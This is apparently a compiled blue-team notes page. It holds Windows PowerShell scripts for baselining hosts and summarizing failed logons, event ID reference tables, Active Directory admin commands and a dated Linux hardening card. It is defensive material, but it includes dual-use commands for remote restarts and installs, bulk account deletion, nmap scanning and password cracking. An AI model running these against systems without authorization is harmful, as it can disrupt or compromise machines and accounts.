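The sheets above are a manual walk-through; as an added example (not SANS code), the PowerShell below snapshots the same items on a current Windows host (processes with owners, services, listening ports with owning process, scheduled tasks with their principal, Administrators group members, Run/RunOnce/RunOnceEx keys and startup folders) and diffs them against a saved baseline, so "search for deviations from the norm" becomes a repeatable check. It assumes Windows PowerShell 5.1 or later on Windows 10 / Server 2016 or later (CimCmdlets, NetTCPIP, ScheduledTasks and LocalAccounts modules present); the baseline file location is an assumption.

```powershell
# Added example, not SANS code: snapshot the items the sheet tells you to review and
# diff them against a saved baseline. Assumes Windows PowerShell 5.1+ on Windows 10 /
# Server 2016+ (CimCmdlets, NetTCPIP, ScheduledTasks and LocalAccounts modules present).
#Requires -RunAsAdministrator

function Get-HostSnapshot {
    $snap = [ordered]@{}

    # Unusual Processes and Services: name, image path and owner (SYSTEM / Administrators stand out).
    $snap.Processes = @(Get-CimInstance Win32_Process | ForEach-Object {
        $owner = Invoke-CimMethod -InputObject $_ -MethodName GetOwner -ErrorAction SilentlyContinue
        '{0}|{1}|{2}\{3}' -f $_.Name, $_.ExecutablePath, $owner.Domain, $owner.User
    })
    $snap.Services = @(Get-CimInstance Win32_Service | ForEach-Object {
        '{0}|{1}|{2}|{3}' -f $_.Name, $_.StartMode, $_.StartName, $_.PathName
    })

    # Unusual Network Usage: listening TCP ports with the owning process (what netstat -nao shows).
    $snap.Listeners = @(Get-NetTCPConnection -State Listen | ForEach-Object {
        $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        '{0}:{1}|{2}|{3}' -f $_.LocalAddress, $_.LocalPort, $_.OwningProcess, $proc.ProcessName
    })

    # Unusual Scheduled Tasks: keep the principal so SYSTEM, Administrators or blank users are visible.
    $snap.Tasks = @(Get-ScheduledTask | ForEach-Object {
        $actions = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }) -join ';'
        '{0}{1}|{2}|{3}' -f $_.TaskPath, $_.TaskName, $_.Principal.UserId, $actions
    })

    # Unusual Accounts: members of the local Administrators group (net localgroup administrators).
    $snap.Admins = @(Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
        ForEach-Object { $_.Name })

    # Unusual Files and Registry Keys: Run / RunOnce / RunOnceEx in HKLM and HKCU, plus startup folders.
    $snap.Autostart = @(
        foreach ($hive in 'HKLM', 'HKCU') {
            foreach ($sub in 'Run', 'RunOnce', 'RunOnceEx') {
                $path = "${hive}:\Software\Microsoft\Windows\CurrentVersion\$sub"
                $key = Get-Item -Path $path -ErrorAction SilentlyContinue
                if ($null -eq $key) { continue }
                foreach ($name in $key.GetValueNames()) {
                    '{0}\{1}={2}' -f $path, $name, ($key.GetValue($name) -join ' ')
                }
            }
        }
        foreach ($folder in 'Startup', 'CommonStartup') {
            Get-ChildItem -Path ([Environment]::GetFolderPath($folder)) -Force -ErrorAction SilentlyContinue |
                ForEach-Object { $_.FullName }
        }
    )
    return $snap
}

function Compare-HostSnapshot {
    # Emits one row per item that appeared (NEW) or disappeared (GONE) since the baseline.
    param([System.Collections.IDictionary]$Baseline, [System.Collections.IDictionary]$Current)
    foreach ($section in $Current.Keys) {
        $base = @($Baseline[$section] | Where-Object { $null -ne $_ })
        $now  = @($Current[$section]  | Where-Object { $null -ne $_ })
        foreach ($item in $now)  { if ($base -notcontains $item) { [pscustomobject]@{ Section = $section; Change = 'NEW';  Item = $item } } }
        foreach ($item in $base) { if ($now  -notcontains $item) { [pscustomobject]@{ Section = $section; Change = 'GONE'; Item = $item } } }
    }
}

function Import-HostSnapshot([string]$Path) {
    # ConvertFrom-Json returns a PSCustomObject; rebuild the dictionary-of-string-arrays shape.
    $obj = Get-Content -Raw -Path $Path | ConvertFrom-Json
    $dict = @{}
    foreach ($prop in $obj.PSObject.Properties) { $dict[$prop.Name] = @($prop.Value) }
    return $dict
}

# First run writes the baseline (review it by hand once); later runs list deviations from it.
$baselinePath = Join-Path $env:ProgramData 'host-baseline.json'   # assumed location
$current = Get-HostSnapshot
if (-not (Test-Path $baselinePath)) {
    ConvertTo-Json -InputObject $current -Depth 3 | Set-Content -Path $baselinePath
    "Baseline written to $baselinePath"
} else {
    $changes = @(Compare-HostSnapshot -Baseline (Import-HostSnapshot $baselinePath) -Current $current)
    if ($changes.Count -eq 0) { 'No deviations from baseline.' }
    else { $changes | Format-Table -AutoSize -Wrap }   # a deviation is a lead to review, not proof of compromise
}
```

Rows tagged NEW in the Tasks, Admins or Autostart sections are the ones the sheet singles out; review them before acting, since patches and legitimate installs also produce deviations.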


Windows Security Log Quick Reference

User Account Changes
  4720  Created
  4722  Enabled
  4723  User changed own password
  4724  Privileged User changed this user's password
  4725  Disabled
  4726  Deleted
  4738  Changed
  4740  Locked out
  4767  Unlocked
  4781  Name change

Logon Session Events
  4624  Successful logon
  4625  Logon failure (See Logon Failure Codes)
  4647  User initiated logoff
  4778  Remote desktop session reconnected
  4779  Remote desktop session disconnected
  4800  Workstation locked
  4801  Workstation unlocked
  4802  Screen saver invoked
  4803  Screen saver dismissed

Logon Types
  2   Interactive
  3   Network (i.e. mapped drive)
  4   Batch (i.e. scheduled task)
  5   Service (service startup)
  7   Unlock (i.e. unattended workstation with password protected screen saver)
  8   Network Cleartext (Most often indicates a logon to IIS with "basic authentication")
  10  Remote Desktop
  11  Logon with cached credentials

Group Changes
  Type          Scope      Created  Changed  Deleted  Member Added  Member Removed
  Security      Local      4731     4735     4734     4732          4733
  Security      Global     4727     4737     4730     4728          4729
  Security      Universal  4754     4755     4758     4756          4757
  Distribution  Local      4744     4745     4748     4746          4747
  Distribution  Global     4749     4750     4753     4751          4752
  Distribution  Universal  4759     4760     4763     4761          4762

Domain Controller Authentication Events
  4768  A Kerberos authentication ticket (TGT) was requested
  4771  Kerberos pre-authentication failed
  4772  A Kerberos authentication ticket request failed
  See Kerberos Failure Codes.

Kerberos Failure Codes
  0x6   Bad user name
  0x7   New computer account?
  0x9   Administrator should reset password
  0xC   Workstation restriction
  0x12  Account disabled, expired, locked out, logon hours restriction
  0x17  The user's password has expired
  0x18  Bad password
  0x20  Frequently logged by computer accounts
  0x25  Workstation's clock too far out of sync with the DC's

Logon Failure Codes
  0xC0000064  User name does not exist
  0xC000006A  User name is correct but the password is wrong
  0xC0000234  User is currently locked out
  0xC0000072  Account is currently disabled
  0xC000006F  User tried to logon outside his day of week or time of day restrictions
  0xC0000070  Workstation restriction
  0xC0000193  Account expiration
  0xC0000071  Expired password
  0xC0000133  Clocks between DC and other computer too far out of sync
  0xC0000224  User is required to change password at next logon
  0xC0000225  Evidently a bug in Windows and not a risk
  0xC000015b  The user has not been granted the requested logon type (aka logon right) at this machine

Correlate by Logon ID.
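As an added example (not part of the quick reference), the PowerShell below decodes 4625 failures with the Logon Types and Logon Failure Codes tables above and summarizes them per account together with 4740 lockouts, which is the "large number of failed logon attempts or locked out accounts" check from the intrusion discovery sheets. The sample events are constructed; the Get-WinEvent path, the field names read from EventData, and the review threshold of 5 are assumptions.

```powershell
# Added example, not from the quick reference. Decodes 4625 logon failures with the
# Logon Types and Logon Failure Codes tables and summarizes them per account together
# with 4740 lockouts. Sample events at the bottom are constructed; the Get-WinEvent
# path and the review threshold of 5 are assumptions.

$LogonFailureCodes = @{
    '0xC0000064' = 'User name does not exist'
    '0xC000006A' = 'User name is correct but the password is wrong'
    '0xC0000234' = 'User is currently locked out'
    '0xC0000072' = 'Account is currently disabled'
    '0xC000006F' = 'Logon outside day-of-week or time-of-day restrictions'
    '0xC0000070' = 'Workstation restriction'
    '0xC0000193' = 'Account expiration'
    '0xC0000071' = 'Expired password'
    '0xC0000133' = 'Clocks between DC and other computer too far out of sync'
    '0xC0000224' = 'User is required to change password at next logon'
    '0xC0000225' = 'Evidently a bug in Windows and not a risk'
    '0xC000015B' = 'User has not been granted the requested logon type at this machine'
}
$LogonTypes = @{
    2 = 'Interactive'; 3 = 'Network'; 4 = 'Batch'; 5 = 'Service'; 7 = 'Unlock'
    8 = 'NetworkCleartext'; 10 = 'RemoteDesktop'; 11 = 'CachedCredentials'
}

function Resolve-FailureReason {
    # 4625 carries a generic Status (usually 0xC000006D) and a specific SubStatus; normalize
    # both to the upper-case 0x........ form used in the table and prefer the specific one.
    param([string]$Status, [string]$SubStatus)
    foreach ($raw in @($SubStatus, $Status)) {
        if ([string]::IsNullOrWhiteSpace($raw)) { continue }
        $key = '0x{0:X8}' -f [Convert]::ToInt64($raw, 16)
        if ($LogonFailureCodes.ContainsKey($key)) { return "$key $($LogonFailureCodes[$key])" }
    }
    return "$Status/$SubStatus (not in table)"
}

function ConvertFrom-SecurityEvent {
    # Flattens a Get-WinEvent record into the shape the summary expects (EventData fields by name).
    param([Parameter(ValueFromPipeline = $true)] $Record)
    process {
        $xml = [xml]$Record.ToXml()
        $data = @{}
        foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
        [pscustomobject]@{
            Id = $Record.Id; Account = $data['TargetUserName']; Source = $data['IpAddress']
            LogonType = $data['LogonType']; Status = $data['Status']; SubStatus = $data['SubStatus']
        }
    }
}

function Get-FailedLogonSummary {
    param([Parameter(ValueFromPipeline = $true)] $Event, [int]$Threshold = 5)
    begin { $all = [System.Collections.Generic.List[object]]::new() }
    process { if ($Event.Id -in 4625, 4740) { $all.Add($Event) } }
    end {
        $all | Group-Object -Property Account | ForEach-Object {
            $fails = @($_.Group | Where-Object Id -eq 4625)
            $locks = @($_.Group | Where-Object Id -eq 4740)
            $reasons = $fails | ForEach-Object { Resolve-FailureReason $_.Status $_.SubStatus } |
                Group-Object | ForEach-Object { '{0} x{1}' -f $_.Name, $_.Count }
            [pscustomobject]@{
                Account    = $_.Name
                Failures   = $fails.Count
                Lockouts   = $locks.Count
                LogonTypes = (@($fails | ForEach-Object { $LogonTypes[[int]$_.LogonType] } | Sort-Object -Unique) -join ',')
                Sources    = (@($fails | ForEach-Object { $_.Source } | Sort-Object -Unique) -join ',')
                Reasons    = (@($reasons) -join '; ')
                Review     = ($fails.Count -ge $Threshold -or $locks.Count -gt 0)   # the sheet's trigger
            }
        }
    }
}

# Constructed sample: five wrong-password failures then a lockout for jfrost over the network,
# one service-account failure with an expired password, one RDP attempt for an unknown name.
$sample = @(
    1..5 | ForEach-Object { [pscustomobject]@{ Id = 4625; Account = 'jfrost'; Source = '10.0.0.23'; LogonType = '3'; Status = '0xc000006d'; SubStatus = '0xc000006a' } }
    [pscustomobject]@{ Id = 4740; Account = 'jfrost'; Source = '10.0.0.23'; LogonType = $null; Status = $null; SubStatus = $null }
    [pscustomobject]@{ Id = 4625; Account = 'svc_backup'; Source = '10.0.0.5'; LogonType = '5'; Status = '0xc000006d'; SubStatus = '0xc0000071' }
    [pscustomobject]@{ Id = 4625; Account = 'nobody'; Source = '203.0.113.9'; LogonType = '10'; Status = '0xc000006d'; SubStatus = '0xc0000064' }
)
$sample | Get-FailedLogonSummary -Threshold 5 | Format-Table -AutoSize -Wrap
# Against the live Security log (elevated prompt):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4625, 4740 } -MaxEvents 5000 |
#     ConvertFrom-SecurityEvent | Get-FailedLogonSummary | Where-Object Review
```

On the sample, jfrost is flagged (5 failures plus a lockout) while svc_backup and nobody are not; the decoded reason column separates a guessing pattern (0xC000006A) from housekeeping noise such as an expired service-account password (0xC0000071).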

PowerShell RUNAS
Starting with PowerShell 4.0, we can specify that a script requires administrative privileges by including a #Requires statement with the -RunAsAdministrator switch parameter:
#Requires -RunAsAdministrator

Run a script on a remote computer --
invoke-command -computername machine1, machine2 -filepath c:\Script\script.ps1

Remotely shut down another machine after one minute --
Start-Sleep 60; Restart-Computer -Force -ComputerName TARGETMACHINE

Install an MSI package on a remote computer --
(Get-WMIObject -ComputerName TARGETMACHINE -List | Where-Object -FilterScript {$_.Name -eq "Win32_Product"}).Install("\\MACHINEWHEREMSIRESIDES\path\package.msi")

Upgrade an installed application with an MSI-based application upgrade package --
(Get-WmiObject -Class Win32_Product -ComputerName . -Filter "Name='name_of_app_to_be_upgraded'").Upgrade("\\MACHINEWHEREMSIRESIDES\path\upgrade_package.msi")

Remove an MSI package from the current computer --
(Get-WmiObject -Class Win32_Product -Filter "Name='product_to_remove'" -ComputerName .).Uninstall()

Collecting information
Get information about the make and model of a computer --
Get-WmiObject -Class Win32_ComputerSystem

Get information about the BIOS of the current computer --
Get-WmiObject -Class Win32_BIOS -ComputerName .

List installed hotfixes (QFEs, or Windows Update files) --
Get-WmiObject -Class Win32_QuickFixEngineering -ComputerName .

Get the username of the person currently logged on to a computer --
Get-WmiObject -Class Win32_ComputerSystem -Property UserName -ComputerName .

Find just the names of installed applications on the current computer --
Get-WmiObject -Class Win32_Product -ComputerName . | Format-Wide -Column 1

Get IP addresses assigned to the current computer --
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=TRUE -ComputerName . | Format-Table -Property IPAddress

Get a more detailed IP configuration report for the current machine --
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=TRUE -ComputerName . | Select-Object -Property [a-z]* -ExcludeProperty IPX*,WINS*

To find network cards with DHCP enabled on the current computer --
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter "DHCPEnabled=true" -ComputerName .

Enable DHCP on all network adapters on the current computer --
Get-WmiObject -Class Win32_NetworkAdapterConfiguration -Filter IPEnabled=true -ComputerName . | ForEach-Object -Process {$_.EnableDHCP()}

Navigate the Windows Registry like the file system -- cd hkcu:

Search recursively for a certain string within files -- dir -r | select-string "searchforthis"

Find the five processes using the most memory -- ps | sort -p ws | select -last 5

Cycle a service (stop, and then restart it) like DHCP -- Restart-Service DHCP

List all items within a folder -- Get-ChildItem -Force

Recurse over a series of directories or folders -- Get-ChildItem -Force c:\directory -Recurse

Remove all files within a directory without being prompted for each -- Remove-Item C:\tobedeleted -Recurse

Restart the current computer -- (Get-WmiObject -Class Win32_OperatingSystem -ComputerName .).Win32Shutdown(2)

Page 75: edu.anarcho-copy.org IP - Network/BTCSwGSEnotes.pdf · i TABLE OF CONTENTS SECTION TITLE PAGE Table of Contents - Networking/Blue Team Tools

Set-ExecutionPolicy

Although you can create and execute PowerShell scripts,

Microsoft has disabled scripting by default in an effort to

prevent malicious code from executing in a PowerShell

environment. You can use the Set-ExecutionPolicy

command to control the level of security surrounding

PowerShell scripts. Four levels of security are available to

you:

Restricted -- Restricted is the default execution policy

and locks PowerShell down so that commands can be

entered only interactively. PowerShell scripts are not

allowed to run.

All Signed -- If the execution policy is set to All

Signed then scripts will be allowed to run, but only if

they are signed by a trusted publisher.

Remote Signed -- If the execution policy is set to

Remote Signed, any PowerShell scripts that have been

locally created will be allowed to run. Scripts created

remotely are allowed to run only if they are signed by a

trusted publisher.

Unrestricted -- As the name implies, Unrestricted

removes all restrictions from the execution policy.

You can set an execution policy by entering the Set-

ExecutionPolicy command followed by the name of the

policy. For example, if you wanted to allow scripts to run

in an unrestricted manner you could type:

Set-ExecutionPolicy Unrestricted

Get-ExecutionPolicy If you're working on an unfamiliar server, you'll need to

know what execution policy is in use before you attempt to

run a script. You can find out by using the Get-

ExecutionPolicy command.

Get-Service The Get-Service command provides a list of all of the

services that are installed on the system. If you are

interested in a specific service you can append the -Name

switch and the name of the service (wildcards are

permitted) When you do, Windows will show you the

service's state.

Export-CSV Just as you can create an HTML report based on

PowerShell data, you can also export data from PowerShell

into a CSV file that you can open using Microsoft Excel.

The syntax is similar to that of converting a command's

output to HTML. At a minimum, you must provide an

output filename. For example, to export the list of system

services to a CSV file, you could use the following

command:

Get-Service | Export-CSV c:\service.csv

Select-Object If you tried using the command above, you know that there

were numerous properties included in the CSV file. It's often helpful to narrow things down by including only the properties you are really interested in. This is where the Select-Object command comes into play. The Select-Object command allows you to specify specific properties for inclusion. For example, to create a CSV file containing the name of each system service and its status, you could use the following command:

Get-Service | Select-Object Name, Status | Export-CSV c:\service.csv

Get-Process
Just as you can use the Get-Service command to display a list of all of the system services, you can use the Get-Process command to display a list of all of the processes that are currently running on the system.

Stop-Process
Sometimes, a process will freeze up. When this happens, you can use the Get-Process command to get the name or the process ID for the process that has stopped responding. You can then terminate the process by using the Stop-Process command. You can terminate a process based on its name or on its process ID. For example, you could terminate Notepad by using:

Stop-Process -Name notepad
Stop-Process -ID 2668

PowerShell Active Directory

Reset a User Password
Let's start with a typical IT pro task: resetting a user's password. We can easily accomplish this by using the Set-ADAccountPassword cmdlet. The tricky part is that the new password must be specified as a secure string: a piece of text that's encrypted and stored in memory for the duration of your PowerShell session. So first, we'll create a variable with the new password:

PS C:\> $new=Read-Host "Enter the new password" -AsSecureString

Next, we'll enter the new password:

PS C:\>

Now we can retrieve the account (using the samAccountname is best) and provide the new password. Here's the change for user Jack Frost:

PS C:\> Set-ADAccountPassword jfrost -NewPassword $new

Unfortunately, there's a bug with this cmdlet: -Passthru, -Whatif, and -Confirm don't work. If you prefer a one-line approach, try this:

PS C:\> Set-ADAccountPassword jfrost -NewPassword (ConvertTo-SecureString -AsPlainText -String "P@ssw0rd1z3" -force)

Finally, I need Jack to change his password at his next logon, so I'll modify the account by using Set-ADUser:

PS C:\> Set-ADUser jfrost -ChangePasswordAtLogon $True

The command doesn't write to the pipeline or console unless you use -True. But I can verify success by retrieving the username via the Get-ADUser cmdlet and specifying the PasswordExpired property, shown in Figure 2.


Disable and Enable a User Account
Next, let's disable an account. We'll continue to pick on Jack Frost. This code takes advantage of the -Whatif parameter, which you can find on many cmdlets that change things, to verify my command without running it:

PS C:\> Disable-ADAccount jfrost -whatif
What if: Performing operation "Set" on Target "CN=Jack Frost, OU=staff,OU=Testing,DC=GLOBOMANTICS,DC=local".

Now to do the deed for real:

PS C:\> Disable-ADAccount jfrost

When the time comes to enable the account, can you guess the cmdlet name?

PS C:\> Enable-ADAccount jfrost

These cmdlets can be used in a pipelined expression to enable or disable as many accounts as you need. For example, this code disables all user accounts in the Sales department:

PS C:\> get-aduser -filter "department -eq 'sales'" | disable-adaccount

Unlock a User Account
Now, Jack has locked himself out after trying to use his new password. Rather than dig through the GUI to find his account, I can unlock it by using this simple command:

PS C:\> Unlock-ADAccount jfrost

Delete a User Account
Deleting 1 or 100 user accounts is easy with the Remove-ADUser cmdlet. I don't want to delete Jack Frost, but if I did, I could use this code:

PS C:\> Remove-ADUser jfrost -whatif
What if: Performing operation "Remove" on Target "CN=Jack Frost,OU=staff,OU=Testing,DC=GLOBOMANTICS,DC=local".

Or I could pipe in a bunch of users and delete them with one simple command:

PS C:\> get-aduser -filter "enabled -eq 'false'" -property WhenChanged -SearchBase "OU=Employees, DC=Globomantics,DC=Local" | where {$_.WhenChanged -le (Get-Date).AddDays(-180)} | Remove-ADuser -whatif

This one-line command would find and delete all disabled accounts in the Employees organizational unit (OU) that haven't been changed in at least 180 days.

Add Members to a Group
Let's add Jack Frost to the Chicago IT group:

PS C:\> add-adgroupmember "chicago IT" -Members jfrost

It's that simple. You can just as easily add hundreds of users to a group, although doing so is a bit more awkward than I would like:

PS C:\> Add-ADGroupMember "Chicago Employees" -member (get-aduser -filter "city -eq 'Chicago'")

I used a parenthetical pipelined expression to find all users with a City property of Chicago. The code in the parentheses is executed and the resulting objects are piped to the -Member parameter. Each user object is then added to the Chicago Employees group. It doesn't matter whether there are 5 or 500 users; updating group membership takes only a few seconds. This expression could also be written using ForEach-Object, which might be easier to follow.

PS C:\> Get-ADUser -filter "city -eq 'Chicago'" | foreach {Add-ADGroupMember "Chicago Employees" -Member $_}

Enumerate Members of a Group
You might want to see who belongs to a given group. For example, you should periodically find out who belongs to the Domain Admins group:

PS C:\> Get-ADGroupMember "Domain Admins"

The cmdlet writes an AD object for each member to the pipeline. But what about nested groups? My Chicago All Users group is a collection of nested groups. To get a list of all user accounts, all I need to do is use the -Recursive parameter:

PS C:\> Get-ADGroupMember "Chicago All Users" -Recursive | Select DistinguishedName

Disable a Computer Account
Perhaps when you find those inactive or obsolete accounts, you'd like to disable them. Easy enough. We'll use the same cmdlet that we use with user accounts. You can specify it by using the account's samAccountname:

PS C:\> Disable-ADAccount -Identity "chi-srv01$" -whatif
What if: Performing operation "Set" on Target "CN=CHI-SRV01,CN=Computers,DC=GLOBOMANTICS,DC=local".

Or you can use a pipelined expression:

PS C:\> get-adcomputer "chi-srv01" | Disable-ADAccount

I can also take my code to find obsolete accounts and disable all those accounts:

PS C:\> get-adcomputer -filter "Passwordlastset -lt '1/1/2012'" -properties *| Disable-ADAccount


Find Computers by Type
The last task that I'm often asked about is finding computer accounts by type, such as servers or laptops. This requires a little creative thinking on your part. There's nothing in AD that distinguishes a server from a client, other than the OS. If you have a laptop or desktop running Windows Server 2008, you'll need to get extra creative.

You need to filter computer accounts based on the OS. It might be helpful to get a list of those OSs first:

PS C:\> Get-ADComputer -Filter * -Properties OperatingSystem | Select OperatingSystem -unique | Sort OperatingSystem

I want to find all the computers that have a server OS:

PS C:\> Get-ADComputer -Filter "OperatingSystem -like '*Server*'" -properties OperatingSystem,OperatingSystemServicePack | Select Name,Op* | format-list

As with the other AD Get cmdlets, you can fine-tune your search parameters and limit your query to a specific OU if necessary. All the expressions that I've shown you can be integrated into larger PowerShell expressions. For example, you can sort, group, filter, export to a comma-separated value (CSV), or build and email an HTML report, all from PowerShell and all without writing a single PowerShell script! In fact, here's a bonus: a user password-age report, saved as an HTML file:

PS C:\> Get-ADUser -Filter "Enabled -eq 'True' -AND PasswordNeverExpires -eq 'False'" -Properties PasswordLastSet,PasswordNeverExpires,PasswordExpired | Select DistinguishedName,Name,pass*,@{Name="PasswordAge"; Expression={(Get-Date)-$_.PasswordLastSet}} |sort PasswordAge -Descending | ConvertTo-Html -Title "Password Age Report" | Out-File c:\Work\pwage.htm


Controlling File Permissions & Attributes:

Monitoring the permissions on system files is crucial to maintain host integrity.

• Regularly audit your systems for any unauthorized and unnecessary use of the setuid or setgid permissions. “Set-user-ID root” programs run as the root user, regardless of who is executing them, and are a frequent cause of buffer overflows. Many programs are setuid and setgid to enable a normal user to perform operations that would otherwise require root, and can be removed if your users do not need such permission. Find all setuid and setgid programs on your host and discriminately remove the setuid or setgid permissions on a suspicious program with chmod:

root# find / -type f -perm +6000 -ls
59520 30 -rwsr-xr-x 1 root root 30560 Apr 15 1999 /usr/bin/chage
59560 16 -r-sr-sr-x 1 root lp 15816 Jan 6 2000 /usr/bin/lpq
root# chmod -s /usr/bin/chage /usr/bin/lpq
root# ls -l /usr/bin/lpq /usr/bin/chage
-rwxr-xr-x 1 root root 30560 Apr 15 1999 /usr/bin/chage
-r-xr-xr-x 1 root lp 15816 Jan 6 2000 /usr/bin/lpq

• World-writable files are easily altered or removed. Locate all world-writable files on your system:

root# find / -perm -2 ! -type l -ls

In the normal course of operation, several files will be world-writable, including some from /dev and the /tmp directory itself.

• Locate and identify all files that do not have an owner or belong to a group. Unowned files may also be an indication an intruder has accessed your system.

root# find / -nouser -o -nogroup

• Using the lsattr and chattr commands, administrators can modify characteristics of files and directories, including the ability to control deletion and modification above what normal chmod provides. The use of “append-only” and “immutable” attributes can be particularly effective in preventing log files from being deleted, or Trojan Horses from being placed on top of trusted binaries. While not a guarantee a system file or log won’t be modified, only root has the ability to remove this protection. The chattr command is used to add or remove these properties, while the lsattr can be used to list them. Log files can be protected by only permitting appending to them. Once the data has been written, it cannot be removed. While this will require modifications to your log rotation scripts, this can provide additional protection from a cracker attempting to remove his tracks. Once rotated, they should be changed to immutable. Files suitable for these modifications include /bin/login, /bin/rpm, /etc/shadow, and others that should not change frequently.

# chattr +i /bin/login
# chattr +a /var/log/messages
# lsattr /bin/login /var/log/messages
----i--- /bin/login
-----a-- /var/log/messages
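The three find checks above (setuid/setgid binaries, world-writable paths, unowned files) combined into one reusable audit, written as an added example for this page rather than code from the reference card. Each function takes the directory to scan so the same code can be pointed at a constructed tree here or at / on a live host; the sample tree, its file names and the check_tree helper are this example's own assumptions.

```shell
#!/bin/sh
# Added example for this page, not code from the Guardian Digital card.
# Each audit function takes the directory to scan so it can be aimed at a
# constructed tree in a test or at / on a live host (run as root for the
# latter; -xdev keeps find on one filesystem).

# Regular files with the setuid or setgid bit set. The card's "-perm +6000"
# form is no longer accepted by current GNU find (it is spelled -perm /6000
# today); the -4000/-2000 pair below also works with BSD find.
audit_setxid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# World-writable files and directories, symlinks excluded as in the card.
audit_world_writable() {
    find "$1" -xdev -perm -2 ! -type l 2>/dev/null | sort
}

# Paths whose uid or gid no longer maps to a name (leftovers of a deleted
# account, or files an intruder created under an unknown id).
audit_unowned() {
    find "$1" -xdev \( -nouser -o -nogroup \) 2>/dev/null | sort
}

# Succeeds only when none of the three audits reports anything.
check_tree() {
    n=$( { audit_setxid "$1"; audit_world_writable "$1"; audit_unowned "$1"; } | wc -l | tr -d ' ')
    [ "$n" -eq 0 ]
}

# Constructed sample tree (hypothetical paths): one setuid and one setgid
# file, one plain binary, a world-writable file and a 1777 scratch directory.
# Modes are set explicitly so the caller's umask cannot change the result.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/bin" "$d/tmp"
    chmod 0755 "$d/bin"
    printf '#!/bin/sh\necho hi\n' > "$d/bin/suid_tool"; chmod 4755 "$d/bin/suid_tool"
    printf 'x\n' > "$d/bin/sgid_tool";               chmod 2755 "$d/bin/sgid_tool"
    printf 'x\n' > "$d/bin/plain";                   chmod 0755 "$d/bin/plain"
    printf 'scratch\n' > "$d/tmp/scratch";           chmod 0666 "$d/tmp/scratch"
    chmod 1777 "$d/tmp"
    echo "$d"
}

# Human-readable report mirroring the card's three root# commands.
report_tree() {
    echo "setuid/setgid:";  audit_setxid "$1"
    echo "world-writable:"; audit_world_writable "$1"
    echo "unowned:";        audit_unowned "$1"
}
```

On a real host, `report_tree /` as root gives the same information as the card's three commands; `check_tree /var` in a cron job gives a pass/fail exit status that a monitoring system can act on. The /tmp directory itself and some /dev entries are legitimately world-writable, as the card notes, so treat the world-writable list as a review list rather than an automatic failure.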

General Security Tips:

• There should never be a reason for users to be able to run setuid programs from their home directories. Use the nosuid option in /etc/fstab for partitions that are writable by others than root. You may also wish to use the nodev and noexec options on users’ home partitions, as well as /var, which prohibits execution of programs, and creation of character or block devices, which should never be necessary anyway. See the mount man page for more information.

• AutoRPM on Red Hat and apt-get on Debian can be used to download and install any packages on your system for which there are updates. Use care when automatically updating production servers.

• IP Masquerading enables a Linux box with multiple interfaces to act as a gateway to remote networks for hosts connected to the Linux box on the internal network interface. See the IP Masquerading HOWTO for implementation information.

• Install nmap to determine potential communication channels. Can determine remote OS version, perform “stealth” scans by manipulating ICMP, TCP and UDP, and even potentially determine the remote username running the service. Start with something simple like:

# nmap 192.168.1.1

• Password-protect LILO for servers in public environments to require authorization when passing LILO command-line kernel parameters at boot time. Add the password and restricted arguments to /etc/lilo.conf, then be sure to re-run /sbin/lilo:

image = /boot/vmlinuz-2.2.17
label = Linux
read-only
restricted
password = your-password

• The OpenWall kernel patch is a useful set of kernel security improvements that helps to prevent buffer overflows, restrict information in /proc available to normal users, and other changes. Requires compiling the kernel, and not for newbies.

• Ensure system clocks are accurate. The time stamps on log files must be accurate so security events can be correlated with remote systems. Inaccurate records make it impossible to build a timeline. For workstations, it is enough to add a crontab entry:

0-59/30 * * * * root /usr/sbin/ntpdate -su time.timehost.com

• Install and execute the Bastille Linux hardening tool. Bastille is a suite of shell scripts that eliminates many of the vulnerabilities that are common on default Linux installations. It enables users to make educated choices to improve security by asking questions as it interactively steps through securing the host. Features include basic packet filtering, deactivating unnecessary network services, auditing file permissions, and more. Try the non-intrusive test mode first.

• Configure sudo (superuser do) to execute privileged commands as a normal user instead of using su. The administrator supplies his own password to execute specific commands that would otherwise require root access. The /etc/sudoers file controls which users may execute which programs. To permit Dave to only manipulate the printer on magneto:

Cmnd_Alias LPCMDS = /usr/sbin/lpc, /usr/bin/lprm
dave magneto = LPCMDS

Dave executes sudo with the authorized command and enters his own password when prompted:

dave$ sudo /usr/sbin/lpc
Password: <password>
lpc>

• Password security is the most basic means of authentication, yet the most critical means to protect your system from compromise. It is also one of the most overlooked means. Without an effective well-chosen password, your system is sure to be compromised. Obtaining access to any user account on the system is the tough part. From there, root access is only a step away. Run password-cracking programs such as John the Ripper or Crack regularly on systems for which you’re responsible to ensure password security is maintained. Disable unused accounts using /usr/bin/passwd -l. Use the MD5 password during install if your distribution supports it.

• Packet filtering isn’t just for firewalls. Using ipchains, you can provide a significant amount of protection from external threats on any Linux box. To block a particular service from being reached from outside of your local network you might try:

# ipchains -I input -p TCP -s 192.168.1.11 telnet -j DENY -l

This will prevent incoming access to the telnet port on your local machine if the connection originates from 192.168.1.11. This is a very simple example. Be sure to read the IP Chains HOWTO before implementing any firewalling.

Linux Security Resources:

• Apache directory and password protection: http://www.apacheweek.com/features/userauth
• Bastille Linux Project: http://www.bastille-linux.org
• BugTraq Full Disclosure Mailing List: http://www.securityfocus.com/forums/bugtraq/intro.html
• Building Internet Firewalls, Second Edition. O’Reilly & Assoc, ISBN 1565928717
• CERT Security Improvement Modules: http://www.cert.org/security-improvement
• Introduction to Linux Security: http://www.linux-mag.com/1999-10/security_01.html
• Linux Intrusion Detection Resources: http://www.linuxsecurity.com/intrusion-detection
• John the Ripper Password Cracker: http://www.openwall.com/john
• Linux and Open Source Security Advisories: http://www.linuxsecurity.com/advisories
• LinuxSecurity.com Security Reference Info: http://www.linuxsecurity.com/docs
• LinuxSecurity.com Security Discussion Lists: http://www.linuxsecurity.com/mailing-lists.html
• LinuxSecurity.com Tip of the Day: http://www.linuxsecurity.com/tips
• LinuxSecurity.com Weekly Security Newsletter: http://www.linuxsecurity.com/newsletter.html
